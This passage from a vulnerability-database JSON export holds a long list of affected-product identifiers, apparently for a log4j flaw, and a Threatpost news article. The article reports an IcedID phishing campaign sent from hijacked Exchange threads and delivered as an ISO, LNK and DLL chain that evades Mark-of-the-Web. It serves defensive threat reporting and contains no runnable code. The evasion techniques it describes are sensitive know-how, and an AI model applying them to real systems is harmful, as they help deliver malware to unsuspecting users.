"cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*", "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.004\\(000.914\\):-:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_command:4.16.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(2.26\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(2\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1e\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:session_management:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1d\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5\\(1.10000.6\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.17900.52\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(1.26\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:paging_server:14.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.1\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18900.97\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.001\\(000.518\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(4.018\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su2:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*", "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.65000.14\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.006\\(000.156\\):-:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1b\\):*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1k\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1l\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:data_center_network_manager:11.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\(2.1914\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(001\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.002\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(001\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*", "cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_assurance_engine:6.0\\(2.1912\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\(1\\):sr7:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1.22900.6\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(3\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.66000.14\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1h\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\)su3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.22900.28\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:opcenter_intelligence:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1c\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.000\\(000.458\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.010\\(000.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.21900.40\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.002\\(000.116\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:percussion:rhythmyx:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:operation_scheduler:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*", "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_computing_system:006.008\\(001.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es03:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\):*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:12.5\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1a\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, thus adding an extra level of evasion to the campaign\u2019s malicious intent, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a couple of key ways that make it even more dangerous to targets, which include organizations within energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now using compromised Microsoft Exchange servers to send the phishing emails from the account that they stole from, but the delivery of the malicious payload also has shifted in a way that can execute malware without the user even knowing, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. \u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nPreviously the infection chain most commonly associated with IcedID phishing campaigns has been an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email that includes a message about an important document and includes a password-protected ZIP archive file attached, the password for which is included in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a remote-code execution (RCE) bug discovered in Exchange Servers last year that has since been patched but has been [throttled by attackers](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>).\n\nOnce unzipped, the attached file includes a single \u201cISO\u201d file with the same file name as the ZIP archive that was created not that long before the email was sent. That ISO file includes two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing email, researchers said.\n\nWhen a user double clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, which allows for proxy execution of malicious code in main.dll for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader will locate the encrypted payload, which is stored in the resource section of the binary, through the technique API hashing. The resulting hash is then compared with a hardcoded hash, locating the call for FindResourceA, which is dynamically called to fetch the encrypted payload, researchers wrote.\n\nThe ultimate step in the attack chain is that the IcedID \u201cGziploader\u201d payload is decoded and placed in memory and then executed. The GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top_._ \u2013 with information about the infected host, which then can be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malwares ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm [Blue Hexagon](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURk7nu5DOXPXjQHtUbQPB-2Bo-3Dj4oZ_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Baowev7BWgf7-2Fsft7vhZ-2FleI4B1CtNAbekmGpeBhmEFQ0kWRSkTE0FzXKh-2Bz963fPXZn0hvo6ZGATosJpWWMJIx2kznvRhglY0WQkeZMakpGSSCIz9LKVoA7IXOHVn5P16MOaoTEh1LFaqgv30hL1UfNg9Za-2FKpoEtnwzBDLz4DtQVA3dFYwDxuvZKeD9Y8Hi4WQLnSai8UFna4-2BIEwYtA0NcX5KrsjsbSEnjBzFNfZ-2B0-3D>), in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrate that the threat actors know how to evade signature and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PZQLK_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMmRr5z7OIF8mKih-2F25UI0RQa6-2Bdcn0eyt9a-2F-2BxbdAQ8flodV7haNCcr-2BW1iLqgw0DYt7ntjLmuD7PDGwxwwHSq2gHGWVXVmYGWcDbHq95V0DcFYQggLtmHop2EFskxujGp5A7HFr4-2Bzu8HP-2Fn84dnll5nv7EwsYGa4Z-2BkWEdDcrCAY75JBexQSBfFsv2LbL-2Bn1Qz-2FYzen2NsuzLcfAC1av2zq9EhGfkk9KycL0qVySQ-3D>)**, **in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clemens acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 